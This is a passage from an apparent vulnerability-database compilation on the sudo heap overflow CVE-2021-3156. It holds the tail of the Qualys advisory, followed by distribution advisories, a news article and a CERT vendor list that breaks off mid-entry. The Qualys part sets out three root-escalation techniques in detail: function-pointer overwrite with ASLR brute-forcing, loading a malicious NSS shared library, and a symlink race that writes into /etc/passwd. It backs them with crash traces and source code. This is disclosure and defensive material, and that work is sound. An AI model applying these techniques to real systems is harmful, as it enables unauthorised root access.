(domainname=domainname@entry=0x7f6e0d9cc020 \"sudoers\", msgid1=msgid1@entry=0x7f6e0d9cc014 \"user NOT in sudoers\", msgid2=msgid2@entry=0x0, plural=plural@entry=0, n=n@entry=0, category=5) at dcigettext.c:619 \n \n=> 0x7f6e0dde1ea9 <__dcigettext+1257>: cmpb $0x2f,(%rax) \n \nrax 0x4141414141414141 4702111234474983745 \n------------------------------------------------------------------------ \n \nbut LC_MESSAGES was always the default \"C\" locale (not \"C.UTF-8\"), which \ndisables the string translation in gettext() (i.e., gettext() returns \nthe original format string, not our own). \n \nFortunately, however, our brute-forcer produced dozens of unique Sudo \ncrashes and gdb backtraces; among these, three caught our attention, and \nwe eventually exploited all three. \n \n \n======================================================================== \n1/ struct sudo_hook_entry overwrite \n======================================================================== \n \nThe first crash that caught our attention is: \n \n------------------------------------------------------------------------ \nProgram received signal SIGSEGV, Segmentation fault. \n \n0x000056291a25d502 in process_hooks_getenv (name=name@entry=0x7f4a6d7dc046 \"SYSTEMD_BYPASS_USERDB\", value=value@entry=0x7ffc595cc240) at ../../src/hooks.c:108 \n \n=> 0x56291a25d502 <process_hooks_getenv+82>: callq *0x8(%rbx) \n \nrbx 0x56291c1df2b0 94734565372592 \n \n0x56291c1df2b0: 0x4141414141414141 0x4141414141414141 \n------------------------------------------------------------------------ \n \nIncredibly, Sudo's function process_hooks_getenv() crashed (at line 108) \nbecause we directly overwrote a function pointer, getenv_fn (a member of \na heap-based struct sudo_hook_entry): \n \n------------------------------------------------------------------------ \n99 int \n100 process_hooks_getenv(const char *name, char **value) \n101 { \n102 struct sudo_hook_entry *hook; \n103 char *val = NULL; \n... \n107 SLIST_FOREACH(hook, &sudo_hook_getenv_list, entries) { \n108 rc = hook->u.getenv_fn(name, &val, hook->closure); \n------------------------------------------------------------------------ \n \nTo exploit this struct sudo_hook_entry overwrite, we note that: \n \n- the call to getenv_fn (at line 108) is compatible with a call to \nexecve(): \n \n. name (\"SYSTEMD_BYPASS_USERDB\") is compatible with execve()'s \npathname argument; \n \n. &val (a pointer to a NULL pointer) is compatible with execve()'s \nargv; \n \n. hook->closure (a NULL pointer) is compatible with execve()'s envp; \n \n- we can defeat ASLR by partially overwriting the function pointer \ngetenv_fn (which points to the function sudoers_hook_getenv() in the \nshared library sudoers.so); and luckily, the beginning of sudoers.so \ncontains a call to execve() (or execv()): \n \n------------------------------------------------------------------------ \n0000000000008a00 <execv@plt>: \n8a00: f3 0f 1e fa endbr64 \n8a04: f2 ff 25 65 55 05 00 bnd jmpq *0x55565(%rip) # 5df70 <execv@GLIBC_2.2.5> \n8a0b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) \n------------------------------------------------------------------------ \n \n- we can read /dev/kmsg (dmesg) as an unprivileged user on Ubuntu, and \ntherefore obtain detailed information about our Sudo crashes. \n \nConsequently, we adopt the following strategy: \n \n- First, we brute-force the exploit parameters until we overwrite \ngetenv_fn with an invalid userland address (above 0x800000000000) -- \nuntil we observe a general protection fault at getenv_fn's call site: \n \n------------------------------------------------------------------------ \nsudoedit[15904] general protection fault ip:55e9b645b502 sp:7ffe53d6fa40 error:0 in sudo[55e9b644e000+1a000] \n^^^ \n------------------------------------------------------------------------ \n \n- Next, we reuse these exploit parameters but overwrite getenv_fn with a \nregular pattern of valid (below 0x800000000000) but unmapped userland \naddresses -- in this example, getenv_fn is the 22nd pointer that we \noverwrite (0x32 is '2', a part of our pattern): \n \n------------------------------------------------------------------------ \nsudoedit[15906]: segfault at 323230303030 ip 0000323230303030 sp 00007ffeeabf2868 error 14 in sudo[55b036c16000+5000] \n^^^^ \n------------------------------------------------------------------------ \n \n- Last, we partially overwrite getenv_fn (we overwrite its two least \nsignificant bytes with 0x8a00, execv()'s offset in sudoers.so, and its \nthird byte with 0x00, user_args's null terminator in set_cmnd()) until \nwe defeat ASLR -- we have a good chance of overwriting getenv_fn with \nthe address of execv() after 2^(3*8-12) = 2^12 = 4096 tries, thus \nexecuting our own binary, named \"SYSTEMD_BYPASS_USERDB\", as root. \n \nWe successfully tested this first exploit on Ubuntu 20.04. \n \n \n======================================================================== \n2/ struct service_user overwrite \n======================================================================== \n \nThe second crash that caught our attention is: \n \n------------------------------------------------------------------------ \nProgram received signal SIGSEGV, Segmentation fault. \n \n0x00007f6bf9c294ee in nss_load_library (ni=ni@entry=0x55cf1a1dd040) at nsswitch.c:344 \n \n=> 0x7f6bf9c294ee <nss_load_library+46>: cmpq $0x0,0x8(%rbx) \n \nrbx 0x41414141414141 18367622009667905 \n------------------------------------------------------------------------ \n \nThe glibc's function nss_load_library() crashed (at line 344) because we \noverwrote the pointer \"library\", a member of a heap-based struct \nservice_user: \n \n------------------------------------------------------------------------ \n327 static int \n328 nss_load_library (service_user *ni) \n329 { \n330 if (ni->library == NULL) \n331 { \n... \n338 ni->library = nss_new_service (service_table ?: &default_table, \n339 ni->name); \n... \n342 } \n343 \n344 if (ni->library->lib_handle == NULL) \n345 { \n346 /* Load the shared library. */ \n347 size_t shlen = (7 + strlen (ni->name) + 3 \n348 + strlen (__nss_shlib_revision) + 1); \n349 int saved_errno = errno; \n350 char shlib_name[shlen]; \n351 \n352 /* Construct shared object name. */ \n353 __stpcpy (__stpcpy (__stpcpy (__stpcpy (shlib_name, \n354 \"libnss_\"), \n355 ni->name), \n356 \".so\"), \n357 __nss_shlib_revision); \n358 \n359 ni->library->lib_handle = __libc_dlopen (shlib_name); \n------------------------------------------------------------------------ \n \nWe can easily transform this struct service_user overwrite into an \narbitrary code execution: \n \n- we overwrite ni->library with a NULL pointer, to enter the block at \nlines 330-342, avoid the crash at line 344, and enter the block at \nlines 344-359; \n \n- we overwrite ni->name (an array of characters, initially \"systemd\") \nwith \"X/X\"; \n \n- lines 353-357 construct the name of a shared library \"libnss_X/X.so.2\" \n(instead of \"libnss_systemd.so.2\"); \n \n- at line 359, we load our own shared library \"libnss_X/X.so.2\" from the \ncurrent working directory and execute our _init() constructor as root. \n \nWe successfully tested this second exploit on Ubuntu 20.04, Debian 10, \nand Fedora 33. \n \n \n======================================================================== \n3/ def_timestampdir overwrite \n======================================================================== \n \nOur third exploit is not derived from one of Sudo's crashes, but from a \ncasual observation: during our brute-force, Sudo created dozens of new \ndirectories in our current working directory (AAAAAA, AAAAAAAAA, etc). \nEach of these directories belongs to root and contains only one small \nfile, named after our own user: Sudo's timestamp file -- we evidently \noverwrote def_timestampdir, the name of Sudo's timestamp directory. \n \nIf we overwrite def_timestampdir with the name of a directory that does \nnot already exist, then we can race against Sudo's ts_mkdirs(), create a \nsymlink to an arbitrary file, and: \n \n3a/ either chown() this arbitrary file to user root and group root; \n \n3b/ or open (or create) this arbitrary file as root, and write a struct \ntimestamp_entry to it. \n \nWe were unable to transform 3a/ into full root privileges (for example, \nif we chown() our own SUID binary to root, then the kernel automatically \nremoves our binary's SUID bit). If you, dear reader, find a solution to \nthis problem, please post it to the public oss-security mailing list! \n \nEventually, we were able to transform 3b/ into full root privileges, but \nwe initially faced two problems: \n \n- Sudo's timestamp_open() deletes our arbitrary symlink if the file it \npoints to is older than boot time. We were able to solve this first \nproblem by creating a very old timestamp file (from the Unix epoch), \nby waiting until timestamp_open() deletes it, and by racing against \ntimestamp_open() to create our final, arbitrary symlink. \n \n- We do not control the contents of the struct timestamp_entry that is \nwritten to the arbitrary file. To the best of our knowledge, we only \ncontrol three bytes (a process ID or a struct timespec), and we were \nunable to transform this three-byte write into full root privileges. \nIf you, dear reader, find a solution to this problem, please post it \nto the public oss-security mailing list! \n \nHowever, we were able to circumvent this second problem by abusing a \nminor bug in Sudo's timestamp_lock(). If we win the two races against \nts_mkdirs() and timestamp_open(), and if our arbitrary symlink points to \n/etc/passwd, then this file is opened as root, and: \n \n------------------------------------------------------------------------ \n65 struct timestamp_entry { \n66 unsigned short version; /* version number */ \n67 unsigned short size; /* entry size */ \n68 unsigned short type; /* TS_GLOBAL, TS_TTY, TS_PPID */ \n.. \n78 }; \n------------------------------------------------------------------------ \n305 static ssize_t \n306 ts_write(int fd, const char *fname, struct timestamp_entry *entry, off_t offset) \n307 { \n... \n318 nwritten = pwrite(fd, entry, entry->size, offset); \n... \n350 } \n------------------------------------------------------------------------ \n619 bool \n620 timestamp_lock(void *vcookie, struct passwd *pw) \n621 { \n622 struct ts_cookie *cookie = vcookie; \n623 struct timestamp_entry entry; \n... \n644 nread = read(cookie->fd, &entry, sizeof(entry)); \n645 if (nread == 0) { \n... \n652 } else if (entry.type != TS_LOCKEXCL) { \n... \n657 if (ts_write(cookie->fd, cookie->fname, &entry, 0) == -1) \n------------------------------------------------------------------------ \n \n- at line 644, the first 0x38 bytes of /etc/passwd (\"root:x:0:0:...\") \nare read into a stack-based struct timestamp_entry, entry; \n \n- at line 652, entry.type is 0x783a (\":x\"), not TS_LOCKEXCL; \n \n- at lines 657 and 318, entry->size bytes from the stack-based entry are \nwritten to /etc/passwd, but entry->size is actually 0x746f (\"ot\"), not \nsizeof(struct timestamp_entry). \n \nAs a result, we write the entire contents of Sudo's stack to /etc/passwd \n(including our command-line arguments and our environment variables): we \ninject an arbitrary user into /etc/passwd and therefore obtain full root \nprivileges. We successfully tested this third exploit on Ubuntu 20.04. \n \nNote: this minor bug in timestamp_lock() was fixed in January 2020 by \ncommit 586b418a, but this fix was not backported to legacy versions. \n \n \n======================================================================== \nAcknowledgments \n======================================================================== \n \nWe thank Todd C. Miller for his professionalism, quick response, and \nmeticulous attention to every detail in our report. We also thank the \nmembers of distros@openwall. \n \n \n======================================================================== \nTimeline \n======================================================================== \n \n2021-01-13: Advisory sent to Todd.Miller@sudo. \n \n2021-01-19: Advisory and patches sent to distros@openwall. \n \n2021-01-26: Coordinated Release Date (6:00 PM UTC). \n \n \n[https://d1dejaj6dcqv24.cloudfront.net/asset/image/email-banner-384-2x.png]<https://www.qualys.com/email-banner> \n \n \n \nThis message may contain confidential and privileged information. If it has been sent to you in error, please reply to advise the sender of the error and then immediately delete it. If you are not the intended recipient, do not read, copy, disclose or otherwise use this message. The sender disclaims any liability for such unauthorized use. NOTE that all incoming emails sent to Qualys email accounts will be archived and may be scanned by us and/or by external service providers to detect and prevent threats to our systems, investigate illegal or inappropriate behavior, and/or eliminate unsolicited promotional emails (\u201cspam\u201d). If you have any concerns about this process, please contact us. \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161160/QSA-CVE-2021-3156.txt"}], "debian": [{"lastseen": "2021-02-05T01:16:20", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2534-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Salvatore Bonaccorso\nJanuary 26, 2021 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : sudo\nVersion : 1.8.19p1-2.1+deb9u3\nCVE ID : CVE-2021-3156\n\nThe Qualys Research Labs discovered a heap-based buffer overflow\nvulnerability in sudo, a program designed to provide limited super user\nprivileges to specific users. Any local user (sudoers and non-sudoers)\ncan exploit this flaw for root privilege escalation.\n\nFor Debian 9 stretch, this problem has been fixed in version\n1.8.19p1-2.1+deb9u3.\n\nWe recommend that you upgrade your sudo packages.\n\nFor the detailed security status of sudo please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/sudo\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 2, "modified": "2021-01-26T18:36:34", "published": "2021-01-26T18:36:34", "id": "DEBIAN:DLA-2534-1:AA5E2", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202101/msg00022.html", "title": "[SECURITY] [DLA 2534-1] sudo security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-05T01:17:32", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4839-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJanuary 26, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : sudo\nCVE ID : CVE-2021-3156\n\nThe Qualys Research Labs discovered a heap-based buffer overflow\nvulnerability in sudo, a program designed to provide limited super user\nprivileges to specific users. Any local user (sudoers and non-sudoers)\ncan exploit this flaw for root privilege escalation.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 1.8.27-1+deb10u3.\n\nWe recommend that you upgrade your sudo packages.\n\nFor the detailed security status of sudo please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/sudo\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2021-01-26T18:05:52", "published": "2021-01-26T18:05:52", "id": "DEBIAN:DSA-4839-1:0839A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00020.html", "title": "[SECURITY] [DSA 4839-1] sudo security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-01-27T20:12:29", "bulletinFamily": "info", "cvelist": ["CVE-2021-3156"], "description": "A doozy of a bug that could allow any local user on most Linux or Unix systems to gain root access has been uncovered \u2014 and it had been sitting there for a decade, researchers said.\n\nThe [bug was found in Sudo](<https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit>), a utility built into most Unix and Linux operating systems that lets a user without security privileges access and run a program with the credentials of another user. Qualys researchers named the vulnerability \u201cBaron Samedit,\u201d tracked as CVE-2021-3156. They said the bug popped into the Sudo code back in July 2011.\n\n\u201cQualys security researchers have been able to independently verify the vulnerability and develop multiple variants of exploit, and obtain full root privileges on [Ubuntu](<https://threatpost.com/billions-of-devices-impacted-secure-boot-bypass/157843/>) 20.04 (Sudo 1.8.31), Debian 10 (Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2),\u201d the report said. \u201cOther operating systems and distributions are also likely to be exploitable.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe authors of Sudo have released a patched update, [Sudo version 1.5.5p2](<https://www.sudo.ws/alerts/unescape_overflow.html>).\n\n\u201cNot all Unix-like systems use the same implementation of Sudo, but this vulnerability is in the implementation distributed from <https://www.sudo.ws/sudo.html> (the Sudo main page) and is a widely used implementation,\u201d David A. Wheeler from the Linux Foundation told Threatpost.\n\nBut the news on the Sudo bug isn\u2019t all terrible.\n\n## **Locals Only: The Good News on the Sudo Bug**\n\n\u201cOne piece of good news: This is not remotely exploitable [without authentication],\u201d Wheeler added. \u201cAn attacker must already be able to run programs on the vulnerable computer before this vulnerability can be used.\u201d\n\nJerry Gamblin, director of security research at Kenna Security, agreed with Wheeler that while the bug is a dangerous vulnerability, the possibility for rampant attacks is low.\n\n\u201cIt is important to level-set that to exploit this vulnerability, a bad actor would need remote (SSH) or direct access to a vulnerable Linux machine,\u201d Gamblin told Threatpost. \u201cWhile it is a vulnerability that should be patched quickly, it does require a certain level of preexisting access, which makes widespread exploitation unlikely.\u201d\n\nThat said, malicious insiders or attackers who have achieved initial-stage access to a Linux environment are still perfectly capable of exploiting the issue. Linux botnets are also an attack vector. The recently discovered [FreakOut malware](<https://threatpost.com/linux-attack-freakout-malware/163137/>), for instance, targets Linux devices with specific products that have not been patched against various flaws. It adds compromised devices to a botnet that can then be used for multiple purposes, such as pushing additional malware or carrying out denial-of-service attacks. It also has brute-force abilities using hard-coded credentials to infect other network devices.\n\n\u201cI expect this CVE to have a CVSS score that falls in the range of 6 to 8. It is a local attack that requires low complexity and affects integrity and confidentiality,\u201d Gamblin said. \u201cThe risk for this vulnerability would be significantly higher if you offer terminal access to low privileged users, such as in an educational environment or an environment in which access is given to employees to run or monitor individual tasks.\u201d\n\n## **Sudo, a Double-Bug Perfect Storm **\n\nHere\u2019s how the vuln works: Specifically, the bug is a heap-based buffer overflow in Sudo, which lets any local user trick it into running in \u201cshell\u201d mode.\n\nSudo authors explained in a Tuesday advisory that when [Sudo is running in shell mode](<https://www.sudo.ws/alerts/unescape_overflow.html>), \u201cit escapes special characters in the command\u2019s arguments with a backslash.\u201d Then, a policy plug-in removes any escape characters before deciding on the Sudo user\u2019s permissions.\n\nBut it\u2019s not just a single bug which exposed these systems, it\u2019s actually the combination of two bugs working in tandem in Sudo that makes the exploitation possible, the authors explained.\n\n\u201cA bug in the code that removes the escape characters will read beyond the last character of a string if it ends with an unescaped backslash character,\u201d the Sudo authors explained. \u201cUnder normal circumstances, this bug would be harmless since Sudo has escaped all the backslashes in the command\u2019s arguments.\u201d\n\nBut another vuln, to which the CVE is assigned, was lurking in Sudo that made exploitation a threat.\n\n\u201cHowever, due to a different bug, this time in the command-line parsing code, it is possible to run \u201csudoedit\u201d with either the -s or -i options, setting a flag that indicates shell mode is enabled,\u201d according to the alert. \u201cBecause a command is not actually being run, Sudo does _not_ escape special characters. Finally, the code that decides whether to remove the escape characters did not check whether a command is actually being run, just that the shell flag is set. This inconsistency is what makes the bug exploitable.\u201d\n\n## **Linux/Unix Buffer Overflow **\n\nTechnically speaking, the vulnerable code overflows the heap-based buffer \u201cuser_args\u201d which gives attackers control over the size and contents of the overflow and allows them to change bytes in the overflow, according to Qualys.\n\n\u201cFor example, on an amd64 Linux, the following command allocates a 24-byte \u201cuser_args\u201d buffer (a 32-byte heap chunk) and overwrites the next chunk\u2019s size field with \u201cA=a\\0B=b\\0\u201d (0x00623d4200613d41), its fd field with \u201cC=c\\0D=d\\0\u201d (0x00643d4400633d43), and its bk field with \u201cE=e\\0F=f\\0\u2033 (0x00663d4600653d45):\u201d the report said.\n\nQualys researchers published a proof-of-concept (PoC) video:\n\nWheeler added that anyone running the system should implement the patched update as soon as possible.\n\n\u201cAnother piece of good news is that this is easily fixed and updated; fixing this shouldn\u2019t change how it works in the normal case,\u201d Wheeler added. \u201cSo you should immediately update to the fixed version.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "modified": "2021-01-27T19:16:41", "published": "2021-01-27T19:16:41", "id": "THREATPOST:3A6A7F7256BF05AA048512CF2D064F7F", "href": "https://threatpost.com/sudo-bug-root-access-linux-2/163395/", "type": "threatpost", "title": "Sudo Bug Gives Root Access to Mass Numbers of Linux Systems", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2021-02-04T15:26:28", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "\nTodd C. Miller reports:\n\nWhen invoked as sudoedit, the same set of command line options\n\t are now accepted as for sudo -e. The -H and -P options are now\n\t rejected for sudoedit and sudo -e which matches the sudo 1.7\n\t behavior. This is part of the fix for CVE-2021-3156.\nFixed a potential buffer overflow when unescaping backslashes in\n\t the command's arguments. Normally, sudo escapes special characters\n\t when running a command via a shell (sudo -s or sudo -i). However,\n\t it was also possible to run sudoedit with the -s or -i flags in\n\t which case no escaping had actually been done, making a buffer\n\t overflow possible. This fixes CVE-2021-3156.\n\n", "edition": 2, "modified": "2021-01-26T00:00:00", "published": "2021-01-26T00:00:00", "id": "F3CF4B33-6013-11EB-9A0E-206A8A720317", "href": "https://vuxml.freebsd.org/freebsd/f3cf4b33-6013-11eb-9a0e-206a8a720317.html", "title": "sudo -- Multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2021-02-04T14:44:47", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "**CentOS Errata and Security Advisory** CESA-2021:0221\n\n\nThe sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2021-January/048252.html\n\n**Affected packages:**\nsudo\nsudo-devel\n\n**Upstream details at:**\n", "edition": 2, "modified": "2021-01-27T00:11:23", "published": "2021-01-27T00:11:23", "id": "CESA-2021:0221", "href": "http://lists.centos.org/pipermail/centos-announce/2021-January/048252.html", "title": "sudo security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2021-02-04T12:34:26", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "Sudo (superuser do) allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments. Sudo operates on a per-command basis. It is not a replacement for the shell. Features include: the ability to restrict what commands a user may run on a per-host basis, copious logging of each command (providing a clear audit trail of who did what), a configurable timeout of the sudo command, and the ability to use the same configuration file (sudoers) on many different machines. ", "modified": "2021-01-27T04:12:23", "published": "2021-01-27T04:12:23", "id": "FEDORA:60E3A30D1484", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: sudo-1.9.5p2-1.fc32", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T12:34:26", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "Sudo (superuser do) allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments. Sudo operates on a per-command basis. It is not a replacement for the shell. Features include: the ability to restrict what commands a user may run on a per-host basis, copious logging of each command (providing a clear audit trail of who did what), a configurable timeout of the sudo command, and the ability to use the same configuration file (sudoers) on many different machines. ", "modified": "2021-01-27T01:19:48", "published": "2021-01-27T01:19:48", "id": "FEDORA:353D73154ABE", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: sudo-1.9.5p2-1.fc33", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2021-02-24T14:45:11", "bulletinFamily": "info", "cvelist": ["CVE-2021-3156"], "description": "### Overview\n\nA heap-based overflow has been discovered in sudo, which may allow a local attacker to execute commands with elevated administrator privileges.\n\n### Description\n\nFrom the [Sudo Main Page](<https://sudo.ws>):\n\n> Sudo (su \"do\") allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\n\nIt is possible for a local Non-administrative user to exploit this vulnerability to elevate their privileges so that they can execute commands with administrator privileges. The team at [Qualys](<https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit>) assigned this vulnerability CVE-2021-3156 and found multiple *nix operating systems were vulnerable, including Fedora, Debian, and Ubuntu. A blog update from February 3, 2021, reports that macOS, AIX, and Solaris may be vulnerable, but Qualys had not yet confirmed this. There is [additional reporting](<https://www.zdnet.com/article/recent-root-giving-sudo-bug-also-impacts-macos/>) that other operating systems are affected, including Apple\u2019s Big Sur.\n\n### Impact\n\nIf an attacker has local access to an affected machine then it is possible for them to execute commands with administrator privileges.\n\n### Solution\n\n**Apply an Update**\n\nUpdate sudo to the latest version to address this vulnerability when operationally feasible. This issue is resolved in sudo version 1.9.5p2. Please install this version, or a version from your distribution that has the fix applied to it\n\n### Acknowledgements\n\nThis vulnerability was researched and reported by the Qualys Research Team.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information \n\n794544\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Cisco __ Affected\n\nNotified: 2021-02-15 Updated: 2021-02-15\n\n**Statement Date: February 15, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nCisco is tracking this vulnerability via incident PSIRT-0750174077 .\n\nCisco has published a customer facing advisory here: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM\n\nit's in interim status and gets update regularly as our investigation of the product base progresses.\n\n#### References\n\n * <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM>\n\n### Debian GNU/Linux __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: January 26, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.debian.org/security/2021/dsa-4839>\n\n### F5 Networks Inc. __ Affected\n\nNotified: 2021-02-04 Updated: 2021-02-05\n\n**Statement Date: February 05, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nF5 BIG-IP and BIG-IQ products are NOT VULNERABLE to CVE-2021-3156.\n\nF5 Traffix SDC is vulnerable.\n\nPlease see [K86488846: Sudo vulnerability CVE-2021-3156](<https://support.f5.com/csp/article/K86488846>) for more information.\n\n#### References\n\n * <https://support.f5.com/csp/article/K86488846>\n\n### Fedora Project __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: January 26, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://access.redhat.com/errata/RHSA-2021:0218?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0219?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0220?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0221?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0222?language=en>\n\n### Gentoo Linux __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: January 26, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.gentoo.org/glsa/202101-33>\n\n### HardenedBSD __ Affected\n\nNotified: 2021-02-04 Updated: 2021-02-05\n\n**Statement Date: February 04, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nHardenedBSD's sudo port has been updated and can be used to mitigate affected systems. Systems that have updated their sudo port/package are no longer vulnerable.\n\n#### References\n\n * <https://github.com/HardenedBSD/hardenedbsd-ports/commits/master/security/sudo>\n\n### Joyent __ Affected\n\nNotified: 2021-02-04 Updated: 2021-02-10\n\n**Statement Date: February 10, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nSmartOS gets its sudo binary from pkgsrc(1). pkgsrc's main feed has updated sudo binaries, and one merely need `pkgin upgrade` in any affected SmartOS zone to get the fixed version.\n\n### NetApp __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: February 03, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://security.netapp.com/advisory/ntap-20210128-0002/>\n\n### Openwall GNU/*/Linux __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: January 26, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.openwall.com/lists/oss-security/2021/01/26/3>\n\n### Oracle Corporation __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: January 27, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.tenable.com/plugins/nessus/145461>\n * <https://linux.oracle.com/errata/ELSA-2021-0221.html>\n * <https://linux.oracle.com/errata/ELSA-2021-0218.html>\n * <https://linux.oracle.com/errata/ELSA-2021-9019.html>\n\n### Red Hat __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: January 26, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://access.redhat.com/node/5738141>\n * <https://access.redhat.com/errata/RHSA-2021:0218?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0219?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0220?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0221?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0222?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0223?language=en>\n * <https://access.redhat.com/errata/RHSA-2021:0227?language=en>\n\n### SUSE Linux __ Affected\n\nNotified: 2021-02-04 Updated: 2021-02-05\n\n**Statement Date: February 05, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nSUSE has already provided fixes for the affected supported products. Users should patch their systems. SUSE Linux Enterprise Server 12 and SUSE Linux Enterprise Server 15 products are affected. SUSE Linux Enterprise Server 11 products are not affected.\n\n#### References\n\n * <https://www.suse.com/de-de/support/kb/doc/?id=000019841>\n * <https://www.suse.com/security/cve/CVE-2021-3156/>\n * <https://bugzilla.suse.com/show_bug.cgi?id=1181090>\n\n### Synology __ 